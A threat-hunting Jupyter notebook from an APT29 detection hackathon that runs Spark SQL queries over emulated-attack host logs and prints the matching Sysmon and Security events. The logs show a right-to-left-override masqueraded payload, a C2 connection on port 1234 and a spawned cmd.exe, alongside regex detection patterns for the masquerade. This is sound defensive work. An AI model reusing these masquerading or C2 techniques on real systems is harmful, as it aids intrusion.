Contents

Free Telemetry Notebook

Group

APT29

Description

APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015.

Author

Open Threat Research - APT29 Detection Hackathon

Telemetry Detection Category

# Importing Libraries
from bokeh.io import show
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, LabelSet, HoverTool
from bokeh.transform import dodge
import pandas as pd

# You need to run this code at the beginning in order to show visualization using Jupyter Notebooks
from bokeh.io import output_notebook
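output_notebook()

# Per-result detection data for the APT29 evaluation as published by OTR.
# Columns used below: step, stepname, substep, vendor, detectiontype.
RESULTS_URL = 'https://raw.githubusercontent.com/OTRF/ThreatHunter-Playbook/master/docs/evals/apt29/data/otr_results.json'
apt29 = pd.read_json(RESULTS_URL)

# Distinct sub-steps per emulation step: the denominator of the coverage ratio.
total_per_step = (
    apt29
    .groupby(['step', 'stepname'])
    .agg(total=pd.NamedAgg(column="substep", aggfunc="nunique"))
)

# Results in the 'Telemetry' detection category per step: the numerator.
# NOTE(review): this counts result rows, not distinct sub-steps; if a
# sub-step ever carries more than one Telemetry row the ratio can exceed
# 100% — confirm the dataset holds one Telemetry row per sub-step.
telemetry_per_step = (
    apt29[apt29['detectiontype'] == 'Telemetry']
    .groupby(['step', 'stepname'])
    .agg(telemetry=pd.NamedAgg(column="vendor", aggfunc="count"))
)

# Left join: a step with no Telemetry result has no row on the right side
# and would otherwise come back as NaN (a float column, a "nan%" label and
# a "3.0"-style hover value). Treat "no telemetry" as zero covered sub-steps.
summary = total_per_step.join(telemetry_per_step).reset_index()
summary['telemetry'] = summary['telemetry'].fillna(0).astype(int)
summary['percentage'] = (summary['telemetry'] / summary['total']).map("{:.0%}".format)

# Overall coverage: covered sub-steps over all sub-steps, as a whole-number string.
total_avg_percentage = '{0:.0f}'.format(summary['telemetry'].sum() / summary['total'].sum() * 100)

# Plain lists feed the ColumnDataSource.
stepname = summary['stepname'].tolist()
total = summary['total'].tolist()
telemetry = summary['telemetry'].tolist()
percentage = summary['percentage'].tolist()

# Single data source shared by both bar series and the data labels.
source = ColumnDataSource(data={
    'stepname': stepname,
    'sub-Steps': total,
    'covered': telemetry,
    'percentage': percentage,
})

# Hover tooltip is attached only to the "covered" bars (renderer named 'needHover').
hover_tool = HoverTool(names=['needHover'], tooltips=[("Covered", "@covered"), ("Percentage", "@percentage")])

# Fixed y-range: must stay above the largest per-step sub-step count or the
# tallest "Total" bar (and its label) is clipped.
p = figure(
    x_range=stepname,
    y_range=(0, 23),
    plot_height=550,
    plot_width=600,
    toolbar_location='right',
    tools=[hover_tool],
)

# Two overlaid bars per step: total sub-steps behind, covered sub-steps in front.
p.vbar(x=dodge('stepname', 0.0, range=p.x_range), top='sub-Steps', width=0.7, source=source, color="#c9d9d3", legend_label="Total")
p.vbar(x=dodge('stepname', 0.0, range=p.x_range), top='covered', width=0.7, source=source, color="#718dbf", legend_label="Covered", name='needHover')

# Legend styling
p.legend.location = "top_right"
p.legend.orientation = "vertical"
p.legend.border_line_width = 3
p.legend.border_line_color = "black"
p.legend.border_line_alpha = 0.3

# Title carries the overall coverage figure
p.title.text = 'Telemetry Detection Category (Average Coverage: {}%)'.format(total_avg_percentage)
p.title.align = 'center'
p.title.text_font_size = '12pt'

# Axis labels; step names are long, so tilt them
p.xaxis.axis_label = 'Emulation Steps'
p.xaxis.major_label_orientation = 45

p.yaxis.axis_label = 'Count of Sub-Steps'

# Numeric label on top of each "Total" bar only
total_label = LabelSet(x='stepname', y='sub-Steps', text='sub-Steps', text_align='center', level='glyph', source=source)
p.add_layout(total_label)

# Render inline in the notebook
show(p)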

Import Libraries

from pyspark.sql import SparkSession

Start Spark Session

# Obtain (or reuse) the notebook's SparkSession and make SQL identifier
# resolution case-sensitive, so field names such as Image and ParentImage
# must be spelled exactly as they appear in the dataset.
builder = SparkSession.builder
spark = builder.getOrCreate()
spark.conf.set("spark.sql.caseSensitive", "true")

Decompress Dataset

# Fetch the Mordor APT29 day-1 dataset archive (~13 MB) over HTTPS.
# NOTE(review): the download is not pinned to a known checksum; compare the
# archive's SHA256 with the value published by the dataset maintainers
# (placeholder: <EXPECTED_SHA256>) before extracting and loading it.
!wget https://github.com/OTRF/mordor/raw/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
--2020-10-16 12:58:40--  https://github.com/OTRF/mordor/raw/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
Resolving github.com (github.com)... 
140.82.112.4
Connecting to github.com (github.com)|140.82.112.4|:443... connected.
HTTP request sent, awaiting response... 
302 Found
Location: https://raw.githubusercontent.com/OTRF/mordor/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip [following]
--2020-10-16 12:58:40--  https://raw.githubusercontent.com/OTRF/mordor/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
HTTP request sent, awaiting response... 
200 OK
Length: 13944973 (13M) [application/zip]
Saving to: ‘apt29_evals_day1_manual.zip’


          apt29_eva   0%[                    ]       0  --.-KB/s               
         apt29_eval   2%[                    ] 315.42K  1.46MB/s               
        apt29_evals   5%[>                   ] 798.74K  1.87MB/s               
       apt29_evals_  10%[=>                  ]   1.34M  2.17MB/s               
      apt29_evals_d  14%[=>                  ]   1.97M  2.39MB/s               
     apt29_evals_da  19%[==>                 ]   2.58M  2.50MB/s               
    apt29_evals_day  25%[====>               ]   3.37M  2.73MB/s               
   apt29_evals_day1  26%[====>               ]   3.54M  2.42MB/s               
  apt29_evals_day1_  27%[====>               ]   3.70M  2.15MB/s               
 apt29_evals_day1_m  30%[=====>              ]   4.06M  2.09MB/s               
apt29_evals_day1_ma  31%[=====>              ]   4.17M  1.89MB/s               
pt29_evals_day1_man  35%[======>             ]   4.65M  1.93MB/s               
t29_evals_day1_manu  40%[=======>            ]   5.37M  2.01MB/s               
29_evals_day1_manua  42%[=======>            ]   5.67M  1.97MB/s               
9_evals_day1_manual  47%[========>           ]   6.29M  2.04MB/s    eta 3s     
_evals_day1_manual.  49%[========>           ]   6.53M  1.90MB/s    eta 3s     
evals_day1_manual.z  50%[=========>          ]   6.76M  1.88MB/s    eta 3s     
vals_day1_manual.zi  51%[=========>          ]   6.90M  1.77MB/s    eta 3s     
als_day1_manual.zip  53%[=========>          ]   7.08M  1.69MB/s    eta 4s     
ls_day1_manual.zip   55%[==========>         ]   7.39M  1.63MB/s    eta 4s     
s_day1_manual.zip    57%[==========>         ]   7.59M  1.53MB/s    eta 4s     
_day1_manual.zip     61%[===========>        ]   8.14M  1.53MB/s    eta 4s     
day1_manual.zip      63%[===========>        ]   8.47M  1.35MB/s    eta 4s     
ay1_manual.zip       64%[===========>        ]   8.64M  1.36MB/s    eta 3s     
y1_manual.zip        69%[============>       ]   9.23M  1.47MB/s    eta 3s     
1_manual.zip         73%[=============>      ]   9.72M  1.53MB/s    eta 3s     
_manual.zip          75%[==============>     ]  10.09M  1.54MB/s    eta 3s     
manual.zip           77%[==============>     ]  10.29M  1.59MB/s    eta 3s     
anual.zip            79%[==============>     ]  10.54M  1.45MB/s    eta 2s     
nual.zip             80%[===============>    ]  10.67M  1.37MB/s    eta 2s     
ual.zip              82%[===============>    ]  10.92M  1.37MB/s    eta 2s     
al.zip               83%[===============>    ]  11.12M  1.26MB/s    eta 2s     
l.zip                85%[================>   ]  11.36M  1.29MB/s    eta 2s     
.zip                 86%[================>   ]  11.54M  1.30MB/s    eta 1s     
zip                  88%[================>   ]  11.73M  1.27MB/s    eta 1s     
ip                   89%[================>   ]  11.92M  1.24MB/s    eta 1s     
p                    92%[=================>  ]  12.25M  1.22MB/s    eta 1s     
                     94%[=================>  ]  12.58M  1.21MB/s    eta 1s     
                  a  98%[==================> ]  13.08M  1.27MB/s    eta 0s     
                 ap  99%[==================> ]  13.20M  1.13MB/s    eta 0s     
apt29_evals_day1_ma 100%[===================>]  13.30M  1.14MB/s    in 9.0s    

2020-10-16 12:58:49 (1.48 MB/s) - ‘apt29_evals_day1_manual.zip’ saved [13944973/13944973]
# Extract into the working directory; the archive holds the single JSON file
# (apt29_evals_day1_manual_2020-05-01225525.json) that is loaded below.
!unzip apt29_evals_day1_manual.zip
Archive:  apt29_evals_day1_manual.zip
  inflating: apt29_evals_day1_manual_2020-05-01225525.json  

Import Datasets

# Load the extracted day-1 host events into a DataFrame.
DAY1_HOST_FILE = 'apt29_evals_day1_manual_2020-05-01225525.json'
df_day1_host = spark.read.format('json').load(DAY1_HOST_FILE)

Create Temporary SQL View

# Register the events as a session-scoped temporary view so the detection
# queries below can refer to them by name in spark.sql().
VIEW_NAME = 'apt29Host'
df_day1_host.createTempView(VIEW_NAME)

Adversary - Detection Steps

1.A.1. User Execution

Procedure: User Pam executed payload rcs.3aka3.doc

Criteria: The rcs.3aka3.doc process spawning from explorer.exe

Detection Type:Telemetry(None)

Query ID:204B00B6-A92B-4EF7-8510-4FB237703147

# 1.A.1 (Sysmon): process-creation events (EventID 1) where explorer.exe is
# the parent and the new image path contains "3aka3" — the user-execution
# step of the emulation.
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(ParentImage) LIKE "%explorer.exe"
    AND LOWER(Image) LIKE "%3aka3%"

'''
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:55:56.157
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=4B7FA56A4E85F88B98D11A6E018698AE3FBA5E62,MD5=9D1C5EF38E6073661C74660B3A71A76E,SHA256=0DF38A55D940F498478EB03683C94D4584236E100125B526A67650BA54DF4AE4,IMPHASH=F00447512A354E59D39D2818AABA4A17
ParentProcessGuid: {47ab858c-dac4-5eac-f202-000000000400}
ParentProcessId: 4440
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\windows\Explorer.EXE 

Query ID:52540C1E-DD76-41B2-93ED-CFBA2B94ECF7

# 1.A.1 (Security log): the same parent/child relationship seen through
# Windows process auditing (EventID 4688), where the fields are named
# ParentProcessName / NewProcessName instead of ParentImage / Image.
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(ParentProcessName) LIKE "%explorer.exe"
    AND LOWER(NewProcessName) LIKE "%3aka3%"

'''
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x214c
	New Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x1158
	Creator Process Name:	C:\Windows\explorer.exe
	Process Command Line:	"C:\ProgramData\victim\‮cod.3aka3.scr" /S

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Detection Type:General(None)

Query ID:DFD6A782-9BDB-4550-AB6B-525E825B095E

# 1.A.1 (General): Sysmon registry value-set events (EventID 13) under the
# per-user AppCompatFlags\Compatibility Assistant\Store key, where Windows
# records executables the Program Compatibility Assistant has handled.
# Backslash layering: the 8 backslashes in this Python literal become 4 in
# the SQL string, 2 after Spark unescapes the literal, and one escaped
# backslash in the Java regex.
# The query is not scoped to the payload, so the output also lists unrelated
# entries (e.g. hostui.exe) written by svchost.exe.
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 13
  AND TargetObject RLIKE '.*\\\\\\\\AppCompatFlags\\\\\\\\Compatibility Assistant\\\\\\\\Store\\\\\\\\.*'

'''
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:01:29.278
ProcessGuid: {47ab858c-cc06-5eac-9402-000000000400}
ProcessId: 1144
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\ProgramData\victim\‮cod.3aka3.scr
Details: Binary Data 
-RECORD 1---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:27.385
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         
-RECORD 2---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:29.863
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         
-RECORD 3---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:29.863
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         

1.A.2. Masquerading

Procedure: Used unicode right-to-left override (RTLO) character to obfuscate file name rcs.3aka3.doc (originally cod.3aka.scr)

Criteria: Evidence of the right-to-left override character (U+202E) in the rcs.3aka.doc process OR the original filename (cod.3aka.scr)

Detection Type:Telemetry(None)

Query ID:F4C71BF4-E068-493D-ABAA-0C5DFA02875D

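# 1.A.2 (Sysmon): process-creation events whose image path contains a Unicode
# bidirectional-control character. These characters reorder how a name is
# displayed (U+202E RLO makes "cod.3aka3.scr" render as "rcs.3aka3.doc").
# Class covers LRM, RLM (U+200E/U+200F) and LRE, RLE, PDF, LRO, RLO
# (U+202A-U+202E). The original pattern embedded the characters literally
# and two of them were mojibaked ("â€..."), so those code points were never
# matched; regex escapes survive copy/paste and re-encoding.
# Escape layering: the raw Python string holds '\\u202E', Spark unescapes the
# SQL literal to '\u202E', and the Java regex engine reads that as the code
# point. The surrounding '.*' is harmless whichever match semantics RLIKE uses.
BIDI_CONTROL_CLASS = r"[\\u200E\\u200F\\u202A-\\u202E]"
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(Image) RLIKE '.*{bidi}.*'
'''.format(bidi=BIDI_CONTROL_CLASS)
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)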
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:55:56.157
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=4B7FA56A4E85F88B98D11A6E018698AE3FBA5E62,MD5=9D1C5EF38E6073661C74660B3A71A76E,SHA256=0DF38A55D940F498478EB03683C94D4584236E100125B526A67650BA54DF4AE4,IMPHASH=F00447512A354E59D39D2818AABA4A17
ParentProcessGuid: {47ab858c-dac4-5eac-f202-000000000400}
ParentProcessId: 4440
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\windows\Explorer.EXE 

Query ID:D94222A0-72F9-4F1E-84A9-F14CA1098D44

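# 1.A.2 (Security log): the same check against NewProcessName in Windows
# process-auditing events (EventID 4688).
# Class covers the Unicode bidirectional-control characters LRM, RLM
# (U+200E/U+200F) and LRE, RLE, PDF, LRO, RLO (U+202A-U+202E). The original
# pattern embedded them literally and two were mojibaked ("â€..."), so those
# code points were never matched; regex escapes survive re-encoding.
# Escape layering: raw Python '\\u202E' -> SQL literal unescaped by Spark to
# '\u202E' -> read by the Java regex engine as the code point.
BIDI_CONTROL_CLASS = r"[\\u200E\\u200F\\u202A-\\u202E]"
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(NewProcessName) RLIKE '.*{bidi}.*'
'''.format(bidi=BIDI_CONTROL_CLASS)
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)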
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x214c
	New Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x1158
	Creator Process Name:	C:\Windows\explorer.exe
	Process Command Line:	"C:\ProgramData\victim\‮cod.3aka3.scr" /S

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

1.A.3. Uncommonly Used Port

Procedure: Established C2 channel (192.168.0.5) via rcs.3aka3.doc payload over TCP port 1234

Criteria: Established network channel over port 1234

Detection Type:Telemetry(None)

Query ID:B53A710B-43AB-4B57-BD92-4E787D494978

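# 1.A.3 (Sysmon): network-connection events (EventID 3) initiated by an image
# whose path contains a Unicode bidirectional-control character, i.e. the
# RTLO-named payload from 1.A.2.
# NOTE(review): the step's criteria is the channel on TCP port 1234; this
# query keys on the process name only, so the port is confirmed by reading
# DestinationPort in the returned Message rather than filtered on.
# Class covers LRM, RLM (U+200E/U+200F) and LRE, RLE, PDF, LRO, RLO
# (U+202A-U+202E). The original pattern embedded the characters literally and
# two were mojibaked ("â€..."), so those code points were never matched.
# Escape layering: raw Python '\\u202E' -> SQL literal unescaped by Spark to
# '\u202E' -> read by the Java regex engine as the code point.
BIDI_CONTROL_CLASS = r"[\\u200E\\u200F\\u202A-\\u202E]"
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 3
    AND LOWER(Image) RLIKE '.*{bidi}.*'
'''.format(bidi=BIDI_CONTROL_CLASS)
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)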
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:55:59.631
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59835
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 1234
DestinationPortName: - 

Query ID:1BAC5645-83CD-4D6F-A4F8-659084401F47

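# 1.A.3 (Security log): Windows Filtering Platform "connection permitted"
# events (EventID 5156) from an application whose name contains a Unicode
# bidirectional-control character. The Application field uses the NT device
# path form (\device\harddiskvolumeN\...), so a drive-letter prefix match
# would miss it; the control-character check is independent of path form.
# Class covers LRM, RLM (U+200E/U+200F) and LRE, RLE, PDF, LRO, RLO
# (U+202A-U+202E). The original pattern embedded the characters literally and
# two were mojibaked ("â€..."), so those code points were never matched.
# Escape layering: raw Python '\\u202E' -> SQL literal unescaped by Spark to
# '\u202E' -> read by the Java regex engine as the code point.
BIDI_CONTROL_CLASS = r"[\\u200E\\u200F\\u202A-\\u202E]"
query = '''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 5156
  AND LOWER(Application) RLIKE '.*{bidi}.*'
'''.format(bidi=BIDI_CONTROL_CLASS)
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)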
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		8524
	Application Name:	\device\harddiskvolume2\programdata\victim\‮cod.3aka3.scr

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59835
	Destination Address:	192.168.0.5
	Destination Port:		1234
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 

1.A.4. Standard Cryptographic Protocol

Procedure: Used RC4 stream cipher to encrypt C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is encrypted

Detection Type:None(None)

Query ID:E12B701E-1222-413C-BCAF-F357CB769B3E

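# 1.A.4 (Sysmon): image-load events (EventID 7) where the payload maps
# bcrypt.dll, the Windows CNG primitives library. Loading the library only
# shows crypto APIs were available to the process; it does not by itself
# show that the C2 traffic was encrypted, which is why this step is rated
# Detection Type: None above.
# Image is lower-cased before the LIKE, matching every other query in this
# notebook (the original compared the raw path).
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 7
  AND LOWER(Image) LIKE "%3aka3%"
  AND LOWER(ImageLoaded) LIKE '%bcrypt.dll'
'''
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)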
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 02:55:56.949
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
ImageLoaded: C:\Windows\System32\bcrypt.dll
FileVersion: 10.0.18362.267 (WinBuild.160101.0800)
Description: Windows Cryptographic Primitives Library
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: bcrypt.dll
Hashes: SHA1=421C35E0949143DE72C8F98776565D24815AD47E,MD5=F46778029BE7D755EBDCDF048EA62A4B,SHA256=907A4D1D405283AD24BBA1F9A763C5118A33574F3E0EC7FC543F65B24CC0A748,IMPHASH=E5649DCD6FA9472DB9A89CCD123913C0
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

1.B.1. Command-Line Interface

Procedure: Spawned interactive cmd.exe

Criteria: cmd.exe spawning from the rcs.3aka3.doc process

Detection Type:Telemetry(Correlated)

Query ID:4799C203-573A-49CB-ACE4-8C4C5CD3862A

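# 1.B.1 (Sysmon): process-creation events (EventID 1) where the parent image
# path contains a Unicode bidirectional-control character (the RTLO-named
# payload) and the child is cmd.exe — the payload opening a shell.
# Class covers LRM, RLM (U+200E/U+200F) and LRE, RLE, PDF, LRO, RLO
# (U+202A-U+202E). The original pattern embedded the characters literally and
# two were mojibaked ("â€..."), so those code points were never matched.
# Escape layering: raw Python '\\u202E' -> SQL literal unescaped by Spark to
# '\u202E' -> read by the Java regex engine as the code point.
BIDI_CONTROL_CLASS = r"[\\u200E\\u200F\\u202A-\\u202E]"
query = '''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 1
  AND LOWER(ParentImage) RLIKE '.*{bidi}.*'
  AND LOWER(Image) LIKE "%cmd.exe"
'''.format(bidi=BIDI_CONTROL_CLASS)
df = spark.sql(query)
# Vertical, untruncated output so the multi-line Message field is readable.
df.show(100, truncate=False, vertical=True)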
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:56:04.510
ProcessGuid: {47ab858c-e144-5eac-ab03-000000000400}
ProcessId: 2772
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.18362.449 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\windows\system32\cmd.exe"
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
